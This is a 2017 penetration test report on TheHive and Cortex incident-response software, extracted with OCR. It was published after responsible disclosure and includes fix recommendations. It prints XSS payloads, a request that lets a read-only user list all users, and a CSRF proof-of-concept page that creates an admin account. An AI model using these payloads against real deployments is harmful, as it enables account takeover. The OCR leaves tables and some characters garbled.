RANDORISEC 


@ TheHive 
PENTEST REPORT 


TLP:WHITE 


This report is classified TLP:WHITE. TLP:WHITE is information that is for public, unrestricted 
dissemination, publication, web-posting or broadcast. Any member of the Information Exchange may 
publish the information, subject to copyright. 


© RANDORISEC - 2017 Version 1.0 — March 28, 2017 


RANDORISEC TheHive Pentest Report 


1. Executive Summary 


TheHive’ is a free and open-source security incident response platform. It relies on Cortex’ to analyze 
observables (IP, email addresses, domain names, etc...). Both tools were designed and developed by 


TheHive Project’. 


A penetration test, which followed the WAHH* methodology, was performed by RANDORISEC to assess 
the security level of the platform. We tested TheHive Buckfast O (version 2.10.0) and Cortex version 


1.0.0. 


Positive Points 
We were unable to access the web application anonymously. We were also unable to elevate our 


privileges without resorting to social engineering tricks. 


Negative Points 
We have identified a critical vulnerability (Stored Cross-Site Scripting) along with a few less critical ones 
(Reflected Cross-Site Scripting, Vertical privilege escalation, Concurrent session allowed, No account 


lockout policy, No password policy, Information leakage and Cross-Site Request Forgery). 


By exploiting these vulnerabilities, an attacker could trick users into executing malicious code in their 
browsers and/or computers or try to brute-force the authentication mechanism. This could lead to 
illegitimate access or privilege escalation. The only critical vulnerability we found does not come 
directly from TheHive code but from a dependency. The developers have been made aware of the 
vulnerabilities prior to the publication of this report according to the responsible disclosure policy”. 
They assured RANDORISEC that most if not all vulnerabilities would be fixed in Buckfast 2 (version 
2.10.2), due in April 2017. 

We also found some low severity vulnerabilities. They are mainly located in the access part (session 


handling and authentication) and should not be very challenging to fix. 


*https://github.com/CERT-BDF/TheHive 

: https://github.com/CERT-BDF/Cortex 

a https://thehive-project.org/ 

“Web Application Hacker’s Handbook. 

° https://vuls.cert.org/confluence/pages/viewpage.action?pageld=4718642 
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1. Introduction 


1.1. Test Period and Duration 


The pentest was performed in 4 man-days spanning several weeks starting from February 9, 2017 and 


ending on March 21, 2017. 


1.2. Credits 
RANDORISEC and Davy Douhine, the company’s CEO, would like to thank the following professionals, 
listed in alphabetical order, for their help performing the pentest described in this report: 

- Frédéric Cikala 

- Nicolas Mattiocco 

- Florent Montel 

- Mohamed Mrabah 


- | Maximilano Soler 


Important Note 

RANDORISEC and the pentesting professionals that joined it for this pentest have no contract with 
TheHive Project and did not receive any compensation of any sort to perform this pentest. 
RANDORISEC and the pentesting professionals listed above performed this work on their free time 


as a way to contribute to the security of Free, Open Source Software projects. 


1.3. Perimeter and Methodology 

1.3.1. Target 

TheHive and Cortex applications were installed using the public Docker versions, following the 
instructions provided at the following location: 


https://github.com/CERT-BDF/TheHive/wiki/Docker-guide---TheHive-Cortex 


We performed our tests on TheHive Buckfast 0 (version 2.10.0) and on Cortex 1.0.0: 
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TheHive 2.10.0 
Elastic4Play 1.1.2 
Play 2.5.9 
Elastic4s 2.3.0 
ElasticSearch 2.3.0 


1.3.2. Restrictions 


No restrictions were made. 


1.3.3. Test cases 
As the mission we took upon ourselves was a pentest and not an audit, this report contains only the 
vulnerabilities that were found. However, all the main areas that were checked are listed in the 


appendices at the end of this document. 


1.4. Confidentiality 


This report and its appendices are classified TLP: WHITE according to Trusted Introducer’s ISTLP v1.1°. 


$ https://www.trusted-introducer.org/ISTLPv11.pdf 
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2. Vulnerabilities 


TheHive Pentest Report 


Severity levels result from the combination of their impact with their probability of occurrence, which is quantified according to the following scale: Low (L) 
— yellow / Medium (M) — orange/ High (H) — red. 
Note: Only proven or very plausible vulnerabilities are listed. When the tests were not able to highlight significant security holes, those will not be mentioned 
(unless the test was explicitly part of the 


Target(s) 


Stored XSS TheHive 


request). 


Description 


Malicious JavaScript code can be injected. It will be then executed on 
the victim’s browser. 


Risk(s) Severity level 


User impersonation 


TheHive 
Cortex 


Reflected XSS 


Malicious JavaScript code can be injected. It will be then executed on 
the victim’s browser. 


User impersonation 


Vertical 
escalation 


privilege 
TheHive 


An authenticated simple user can have access to some admin menus. 


Facilitates session 
usurpation 


Concurrent sessions 


ARA allowed 


TheHive 


Concurrent sessions are allowed for a single user. 


Facilitates session 
usurpation 


No account lockout 


Facilitates user 


AP.5 i Authentication system can be brute-forced. 
policy TheHive Y impersonation 
As no password policy is enforced when using the local database for 
. ; ; Facilitates user 
AP.6 | No password policy | TheHive |storing user credentials, users can set weak passwords (e.g.: 


containing only one character). 


impersonation 
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Target(s) | Description Risk(s) Severity level 


Information such as_ installed software versions (TheHive, 


Sensitive info leak 
ElasticSearch) is publically available. NE aa ac 


Information leakage | TheHive 


As no anti-CSRF tokens are used, TheHive is vulnerable to CSRF 


CSRF TheHive | attacks. Illegitimate access 
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Severity Target(s) Improvement Suggestions Difficulty 
S 
[e] = 
Sle 
<x 
1 | AP.1 TheHive If possible, use a white list at the application level by defining the expected characters rather 3 
AP.2 Cortex than refusing the dangerous ones. 
If that’s not a possibility, the application should filter meta-characters from user input. When 
performing input validation, consider all potentially relevant properties, including length, type 
of input, the full range of acceptable values, missing or extra inputs, syntax, and consistency 
across related fields, and conformance to business rules. 
2 | AP.3 TheHive Deny access to admin pages to non-admin users. 2 
3 | AP.4 TheHive Only allow one session per user at any given time. 2 
4 | APS TheHive Enforce an account lockout policy. 2 
5 | AP.6 TheHive Implement a password policy or use LDAP or AD authentication and ensure your LDAP/AP 2 
enforces a password policy. 
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Severity Target(s) Improvement Suggestions Difficulty 
= 
[e] = 
Sle 
<x 
6 | AP.7 TheHive Deny access to potentially sensitive information to anonymous, non-authenticated users. 2 
7 | AP.8 TheHive Implement anti-CSRF tokens. 2 
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4. Detailed findings 


4.1. AP.1 - Stored XSS 
TheHive is vulnerable to two HTML and JavaScript stored injections also known as Stored Cross-Site 
Scripting vulnerabilities. They could be used by authenticated users to elevate their privilege by 
hijacking an admin’s session for example. 


The vulnerabilities are located in the Observables functionality and in the Observable management. 


The following screenshot shows that the code will be executed on the victim’s browser: 


1. First Stored XSS: Observables 


Attack scenario: 


An authenticated user with write access (as defined in the user management page) creates an 
observable on a case and puts a malicious JavaScript payload as a value of the observable: 


Create new observable(s) 


Data Type * domain ~ 


Data * <script>alert(/XSS/)</script> 


E Bulk 
I] Mark as IOC 


v Dmm 


Tags ** thehive Add tags 


Æ Required field #%& At least, one required field 


Cancel + Create observable(s) 
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The JavaScript payload used to test this vulnerability is: 
<script>alert (/XSS/) </script> 


The observable item is created: 


r ~~ 


bservables have been successfully created 


Then, if a user that can access the case launches one or many analyzers (for example by clicking 
on the Run all analyzers link) on this observable: 


List of observables (1 of 1) 


Type ~~ Data/Filename «~ Reports Tags Date add: 
| T domain <script>alert(/XSS/)</script> Run all analyzers | ® bibi | 03/20/17 


The payload will be triggered: 


<!DOCTYPE html> 


<html ng-app="thehive"> @ 


head 
style type="“text/css"></style> 
<meta charset="“utf-8"> 
title ng-bind="‘The Hive' + (title ? ' - ' + title : '')">The Hive</title> 
<meta name="description™ content=""> 
<meta name="viewport” content="“width=device-width"> 
l rel="icon" type="ima ong" href="images/favicon.png" 


r 


<script>alert(/XSS/)</script> 


2. Second Stored XSS: Observables management 


Attack scenario: 


An authenticated user with admin access (as defined in the user management page) creates a 
new observable datatype and puts a malicious JavaScript payload as the value of the datatype: 


DataTypes 


"><svg onload=confirm(/XSSagain/)> 


+ Add dataTypes 


The JavaScript payload used to test this vulnerability is: 
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"><svg onload=confirm(/XSSagain/)> 


The new observable datatype is created: 


dataType Action 


& 


"><svg onload=confirm(/XSSagain/)> 


If another admin user tries to delete this new datatype, the payload will be triggered: 


(XSSagain/ 


ae 


The response page shows the JavaScript payload: 
<div class="“ui-notification success clickable" style="top: 2@px; left: 1@px;"> @ 
<h3 class="ng-animate ng-hide-animate ng-hide-add" ng-show="title" ng-bind-html="title" data-ng-animate="2" style="' 


<div class="message" ng-bind-html="message"> 
The datatype “> 
<svg onload="confirm(/XSSagain/)">has been removed</svg> @ 
</div> 
</div> 
</body> 
</html> 


Then the datatype will be deleted. 


This particular behavior of “One-shot Stored XSS” is quite interesting as it could be used to attack 
admininstrators without leaving evidence. However the pre-requisites to exploit it (admin access 
to TheHive) lower the risk of an exploitation using this particular attack vector. 


The root of the vulnerability comes from the angular-ui-notification library which seems to trust 
inputs as HTML: 
https://github.com/alexcrack/angular-ui-notification 


An issue has been opened on GitHub: 
https://github.com/alexcrack/angular-ui-notification/issues/86 


Targets Risk(s) Recommendation Severity 


TheHive User impersonation If possible, use a white list at the 
application level by defining the 
expected characters rather than 
refusing the dangerous ones. 


If that’s not a possibility, the 
application should filter meta- 
characters from user input. When 
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performing input validation, 
consider all potentially relevant 
properties, including length, type 
of input, the full range of 
acceptable values, missing or extra 
inputs, syntax, and consistency 
across related fields, and 
conformance to business rules. 


4.2. AP.2 - Reflected XSS 


TheHive and Cortex are vulnerable to many HTML and JavaScript stored injections also known as 
Reflected Cross-Site Scripting vulnerabilities. They could be used by authenticated users to elevate 
their privileges by hijacking an admin’s session or by anonymous users to impersonate an 
authenticated user’s session for example. 


The vulnerabilities are located in the new analysis functionality for Cortex and in the handling of 
error messages at TheHive’s level. However the latest is very unlikely as it needs Internet Explorer 11 
with compatibility mode enabled. 


1. Reflected XSS in Cortex 


Attack scenario: 


A user with access to Cortex’ starts a new analysis and put a malicious JavaScript payload in the 


Run new analysis 


Data field: 


TP 
Data Type 
Data 


Analyzers 


Cancel 


AMBER 


domain 


script>alert(/XSS/)</script> 


Abuse_Finder_1_0 


O VirusTotal_GetReport_2_0 


O HippoMore_1_0 


O Hipposcore_1_0 


O DomainTools_ReverseNameServer_1_0 


O DomainTools_WhoisLookup_1_0 


O DomainTools_ReverseWhois_1_0 


O DomainTools_WhoisHistory_1_0 


O Fortiguard_URLCategory_1_0 


O DNSDB_DomainName_1_1 


O OTXQuery_1_0 


7 Please note that Cortex does not use any kind of authentication and must not exposed on public networks. 
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The JavaScript payload used to validate the vulnerability is: 
<script>alert (/XSS/) </script> 


The following screenshot shows that the code is executed: 


(Ota 


An excerpt of the response page showing the JavaScript payload is shown below: 

<meta http-equiv="X-UA-Compatible” content="IE=edge"> 

<meta name="description" content=""> 

<meta name="viewport" content="width=device-width"> 

<meta content="“width=device-width, initial-scale=1,maximum-scale=1,user-s 
<link rel="icon" type="image/png" href="favicon.png"> 

<!--Place favicon.ico and apple-touch-icon.png in the root directory--> 
<link rel="stylesheet" href="styles/vendor.c78c2@a8.css"> 

href="styl 


(main.a83cdc6f.css"> 


<script>alert(/XSS/)</script> 
</head> 
<body class="skin-blue layout-top-nav ng-scope” ng-app="cortex"> @ 
> <app-container class="wrapper"></app-container> 
<script src="scripts/vendor.e86e854b.js"></script> 


2. Reflected XSS in TheHive 


Attack scenario: 


An anonymous user sends a link containing a JavaScript payload (or a link to it) like the 


following: 
http://1.1.1.8:8080/api/login?<script>alert ("TheHive vulnerable to XSS_;)")</script> 


If opened, the code is executed: 


(S) |Æ http://1.1.1.8:8080/api/login?<script> alert("TheHive vulnerable to_XSS_:)")</script> 


A client error occurred on GET /api/login? 


Message de la page Web 


TheHive_vulnerable_to_XSS_;) 


Lo) 
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However, the response page states that the content is not HTML (but “text/plain”) so an 
exploitation using this attack vector is very unlikely as the victim has to run an old version of 


Internet Explorer or Internet Explorer 11 with compatibility mode enabled. 


Root of the vulnerability comes from the angular-ui-notification library which seems to trust 
inputs as HTML: 
https://github.com/alexcrack/angular-ui-notification 


An issue has been opened on GitHub: 
https://github.com/alexcrack/angular-ui-notification/issues/86 


Targets Risk(s) Recommendation 

TheHive Userimpersonation | If possible, use a white list at the 

Coney application level by defining the 
expected characters rather than 


refusing the dangerous ones. 


If that’s not a possibility, the application 
should filter meta-characters from user 
input. When performing input 
validation, consider all potentially 
relevant properties, including length, 
type of input, the full range of 
acceptable values, missing or extra 
inputs, syntax, and consistency across 
related fields, and conformance to 
business rules. 


4.3. AP3 - Vertical privilege escalation 


Severity 


An authenticated user with read-only access can use admin functionality and list users created in the 


database. 


Here is a screenshot of a request, asking to list the users, and the response: 


Go <ir 
Request 
Raw | Params | Headers | Hex 


Target: http://thehive.randorisec.fr:8080 |") ej 


Response 


Raw | Headers | Hex 


POST /api/user/_search?range=0-10 HTTP/1.1 


BPTP/1.1 200 OR 


Bost: thehive.randorisec.fr:8080 E X-Total: 3 = 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Set-Cookie: 
Gecko/20100101 Firefox/51.0 PLAY_SESSION=ed22¢7d7 1a6 15b0eecb6e48cd0c3bb7 7eb26 1 5b6-username=maxi. 
Accept: application/json, text/plain, */* 2sexpire=1489027535654; Path=/; HTTPOnly 
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: text/plain; charset=utf£-8 
Referer: http://thehive.randorisec.fr:8080/index. html Connection: close 
Content-Type: application/json;charset=utf-8 Date: Thu, 09 Mar 2017 01:45:35 GMT 
Content-Length: 22 Content-Length: 899 
Cookie: 
PLAY _SESSION=6b5415964£48577£c69186629e5bef 1f 7b4 0b57c—username=maxi2&sexpir Ut 
e=1489027489081 “createdAt” : 1488880121604, 
Connection: close "user" : "init", 

"roles" : [ "read", "write", "admin" ], 
{"query":{"_any":"*"}} "createdBy" : "init" 

"name" : "maxi", 

"status" : "Ok", 

"updatedBy" : "maxiadmin", 

"updatedāt” : 1489023291738, 

"Lid" : "theadmin", 

ia” 

type 

b "has-key" : 
v tit X 

pman fann pacca fananas 0 matches 0 matches 


Done 


1,169 bytes | 569 millis 
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The used request is: 


POST /api/user/_ search?range=0-10 HTTP/1.1 

Host: thehive.randorisec.fr:8080 

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 
Firefox/51.0 

Accept: application/json, text/plain, */* 

Accept-Language: es-ES,es;q=0.8,en-US; q=0.5,en;q=0.3 

Referer: http://thehive.randorisec.fr:8080/index.html 

Content-Type: application/json;charset=utf-8 

Content-Length: 22 

Cookie: PLAY SESSTION=6b5415864c48577£c69186629e5bcf1f7b40b57c- 
username=maxi2é&expire=1489027489081 

Connection: close 


("query":{" any":"*"}} 


A malicious user could use this to list the other users and then try to discover their passwords. 


Targets Risk(s) Recommendation Severity 
TheHive Facilitates Deny access to admin pages to non- 

session admin users. 

usurpation 


4.4. AP.4 - Concurrent sessions allowed 


Concurrent sessions are allowed. 


If an attacker finds a way to hijack a session, it could be unnoticed by the legitimate user. 


Targets Risk(s) Recommendation Severity 
TheHive Facilitates Only allow one session per user at any 

session given time. 

usurpation 


4.5. AP.5 - No account lockout policy 
An attacker could brute-force the authentication system without being stopped or even slowed 
down. 


Here is a screenshot showing a brute-force of 1000 requests against the login page: 


BP Intruder attack 1 


Attack Save Columns 


Results | Target | Positions | Payloads | Options | 


Filter: Showing all items 


Request z Payload _Status J Error Timeout Le 
999 null 401 m] © |202 
998 [nui |401 |202 
997 null 401 m E [202 
996 {null 401 o o |202 
995 null |401 im | im [202 
994 null 401 | [202 
993 [nui |401 =] g |202 
992 null 401 o [202 


Request [ Response 


Raw | Params | Headers | Hex | JSON Decoder | 


harset=utf-8 


{"user":"test1", "password": "test1"} 
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With this issue an attacker could try to discover a user’s password. 


Targets Risk(s) Recommendation Severity 
TheHive Facilitates Enforce an account lockout policy. 

session 

usurpation 


4.6. AP.6 - No password policy 


No password policy is enforced in TheHive when using the local database for storing user credentials. 
Users can thus set weak passwords (e.g.: containing only one character) when changing their 
password. 


This could help an attacker find valid credentials. 


Targets Risk(s) Recommendation Severity 
TheHive Facilitates Implement a password policy or use 
session LDAP or AD authentication and ensure 
usurpation your LDAP/AP enforces a password 
policy. 


4.7. AP.7 - Information leakage 
Information such as installed software versions (TheHive, ElasticSearch) is publicly available. 
Here is a screenshot showing an anonymous request and the response with the version information: 


Request Response 
Raw | Headers Hex | Raw | Headers | Hex | JSON Decoder | 


pi/status HTTP/1.1 zi { 
: text/html, application/xhtml+xml, */* | "config": { 

| guage: fr-FR "authType": [ 
|User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) "local" 


"capabilities": [ 
"changePassword", 
"setPassword" 


This could help an attacker in their reconnaissance phase. 


Targets Risk(s) Recommendation Severity 
TheHive Facilitates Deny access to info to anonymous, 

session non-authenticated users. 

usurpation 
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4.8. AP.8 - CSRF (Cross Site Request Forgery) 


As no anti-CSRF tokens are used, TheHive is vulnerable to CSRF attacks. 


Here is a screenshot showing an authenticated request, without anti-CSRF token, sent to create a 


user: 

POST /api/user HTTP/1.1 a HITP/1.1 201 Created 

Host: thehive.randorisec. fr:8080 Set-Cookie 

User-Agent: Mozilla/S.0 (Windows NT 6.1; WOW6é4; rv:51.0) PLAY_SESSION=650181del fcleb0d53d92135b71864c877876c18-username 
Gecko/20100101 Firefox/51.0 =theadmingexpire=14996857724614; Path=/; HTTPOnly 

Accept: */* Content-Length: 206 

Accept-Language: fr, fr-FR;q=0.8,en-US;q=0.5,en;q=0.3 Content-Type: application/json 

Accept-Encoding: gzip, deflate Date: Thu, 16 Mar 2017 16:35:24 GMT 


Content-Type: application/json 


Content-Length: 102 5s": [“read","write","admin"],"name": "hacker1l0 

Origin: null “_id":"hackerl0O","createdAt": 1489682174465, "created 
Cookie: ":"theadmin","user":"theadmin","status":"Ok","id":"hackerl0O 
PLAY_SESSION=e2 fecle73é99e6aldf610763343b52 £74063c3 f3-username “,"type":"“user","“has-key": false} 


=theadmingexpire=14859685458755 
Connection: keep-alive 


{"roles":["read","“write","admin"],"login":"hackerlO","name":"h 
ackerlO hakckerlO","password": "hacker4"} 


By using social engineering tricks (or a stored XSS) an attacker could trick an admin to launch the 


following request that will create a user and grant illegitimate access: 


<html> 
<script> 
function jsonreq() { 
var xmlhttp = new XMLHttpRequest () ; 
xmlhttp.withCredentials = true; 
xmlhttp.open("POST", "http://thehive.randorisec.fr:8080/api/user", true); 
xmlhttp.setRequestHeader ("Content-Type", "application/json") ; 
xmlhttp.send('{"roles": ["read", "write", "admin"],"login":"hackerl1", "name": "hackerl 
1 hakckerll", "password": "hacker4"}"'); 
} 
jsonreq(); 
</script> 
</html> 


However, this behavior is prohibited by modern browsers and the Same-origin policy (SOP). 
Nonetheless, this vulnerability should been taken in consideration as a loosely configured CORS 


(Cross-Origin Resource Sharing) policy could increase the probability of such attack. 


Targets Risk(s) Recommendation Severity 
TheHive Facilitates session | Implement anti-CSRF tokens. 
usurpation 
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5. Appendices 


5.1 WAHH checks 


Map visible content 


TheHive Pentest Report 


Discover hidden & default content 


Test for debug parameters 


Identify data entry points 


Identify the technologies used 


Map the attack surface 


Authentication 


Test password quality rules 


Test for username enumeration 


Test resilience to password guessing 


Test any account recovery function 


Test any "remember me" function 


Test any impersonation function 


Test username uniqueness 


Check for unsafe distribution of credentials 


Test for fail-open conditions 


Test any multi-stage mechanisms 


Session handling 


Test tokens for meaning 


Test tokens for predictability 


Check for insecure transmission of tokens 


Check for disclosure of tokens in logs 


Check mapping of tokens to sessions 


Check session termination 


Check for session fixation 


Check for cross-site request forgery 


Check cookie scope 


XxX |x |X |X |X |X |x |X |X |X |X |X |X |X |X |x |X |x |x |x |x 


Access controls 


Understand the access control requirements 


Test effectiveness of controls, using multiple accounts 


Test for insecure access control methods (Referer, etc) 
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Fuzz all request parameters 
Test for SQL injection 

Identify all reflected data 

Test for reflected XSS 

Test for HTTP header injection 
Test for arbitrary redirection 


Test for stored attacks 


Test for OS command injection 

Test for path traversal 

Test for script injection 

Test for file inclusion 

Test for SMTP injection 

Test for native software flaws (Bof, integer bugs, format strings) 
Test for SOAP injection 

Test for LDAP injection 

Test for XPath injection 


x | K |X |X |X |X |X |X |X |x |x |x |x |x |x |x 


Identify the logic attack surface 


Test transmission of data via the client 


Test for reliance on client-side input validation 

Test any thick-client components (Java, ActiveX, Flash) 
Test multi-stage processes for logic flaws 

Test handling of incomplete input 


Test trust boundaries 


x |x |X |X |X |x |x |x 


Test transaction logic 


Test segregation in shared infrastructures 
Test segregation between ASP-hosted applications 
Test for web server vulnerabilities 


Default credentials 


Default content 


Dangerous HTTP methods 
Proxy functionality 
Virtual hosting mis-configuration 


Bugs in web server software 
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Check for DOM-based attacks 

Check for frame injection 

Check for local privacy vulnerabilities 
Persistent cookies 


Caching 


Sensitive data in URL parameters 


Forms with autocomplete enabled 
Follow up any information leakage 
Check for weak SSL ciphers 


xX |X |X |X |X |X |x |x 


N/A: Not applicable 
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